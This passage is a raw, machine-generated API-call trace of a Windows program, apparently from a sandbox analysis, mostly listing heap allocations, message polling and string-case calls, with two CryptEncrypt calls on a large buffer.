pdwDataLen=0x8bef68*=0xe8b1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xe8b8) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.546] CharLowerBuffW (in: lpsz="byte[59576]", cchLength=0xb | out: lpsz="byte[59576]") returned 0xb [0253.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.548] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.548] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.549] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.549] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.549] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.549] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.550] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c0b10*, pdwDataLen=0x8bef68*=0xe8b1, dwBufLen=0xe8b8 | out: pbData=0x34c0b10*, pdwDataLen=0x8bef68*=0xe8b8) returned 1 [0253.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0253.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0253.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0253.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.555] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.555] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.555] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.555] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.556] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.556] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.556] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.556] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.556] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.556] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.557] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.557] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.557] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.557] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.558] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.558] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.558] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.558] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.565] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.565] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.572] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.572] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0253.572] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.572] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0253.572] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.572] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.573] CharUpperBuffW (in: 